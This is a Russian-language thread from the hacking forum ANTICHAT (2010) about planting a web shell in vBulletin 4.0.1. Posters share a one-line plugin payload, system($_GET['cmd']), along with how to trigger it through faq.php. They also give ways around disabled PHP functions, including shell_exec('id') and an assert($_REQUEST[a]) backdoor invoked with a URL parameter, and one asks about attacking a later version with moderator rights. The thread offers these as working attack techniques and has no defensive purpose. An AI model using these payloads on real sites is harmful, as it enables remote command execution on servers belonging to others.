HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу шелл в vBulletin 4.0.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

шелл в vBulletin 4.0.1
  #1  
Старый 04.02.2010, 15:30
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
С нами: 9327322

Репутация: 15
По умолчанию шелл в vBulletin 4.0.1
создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции
в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.02.2010, 15:39
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
system может быть в дизабл функшионс, сначала посмотри phpinfo
 
Ответить с цитированием

  #3  
Старый 04.02.2010, 15:43
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами: 8700497

Репутация: 388
По умолчанию
eval попробуй заюзать
 
Ответить с цитированием

  #4  
Старый 04.02.2010, 15:49
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию
Цитата:
Сообщение от $ereg@  
создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции
в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?
faq.php находится в корне форума..а не в админке.
 
Ответить с цитированием

  #5  
Старый 04.02.2010, 16:17
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
С нами: 9327322

Репутация: 15
По умолчанию
гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)
 
Ответить с цитированием

  #6  
Старый 08.02.2010, 12:09
greenly
Новичок
Регистрация: 09.09.2009
Сообщений: 7
С нами: 8774721

Репутация: 0
По умолчанию
что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons "
 
Ответить с цитированием

  #7  
Старый 09.02.2010, 02:49
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами: 10130311

Репутация: 183
По умолчанию
Цитата:
Сообщение от greenly  
что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons "
Воспользоваться альтернативой если такая имеется..
К примеру: shell_exec
PHP код:
<? echo(shell_exec('id')); ?>
Либо обходится средствами php.
 
Ответить с цитированием

  #8  
Старый 09.02.2010, 17:52
greenly
Новичок
Регистрация: 09.09.2009
Сообщений: 7
С нами: 8774721

Репутация: 0
По умолчанию
shell_exec, eval тоже в запрете.
будем курить php
 
Ответить с цитированием

  #9  
Старый 09.02.2010, 18:18
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
<?assert($_REQUEST[a]);?>

http://site/script.php?a=phpinfo();

и еще куча вариантов
 
Ответить с цитированием

  #10  
Старый 28.03.2010, 10:47
Serafim
Участник форума
Регистрация: 24.10.2006
Сообщений: 261
С нами: 10288451

Репутация: 174
По умолчанию
А вот на счет 4.0.2 + права модера?

Реально ли?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужно залить шелл на сайт и задампить за $$$ на vBulletin 3.7.3 ZARO Freelance - О Работе 2 27.05.2010 08:24
Как залить шелл в vBulletin v3.6.0? Elenberg Уязвимости CMS / форумов 19 06.02.2009 10:00
Как загрузить шелл в vBulletin Version 3.6.2 ? cardons Уязвимости CMS / форумов 3 25.11.2006 06:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.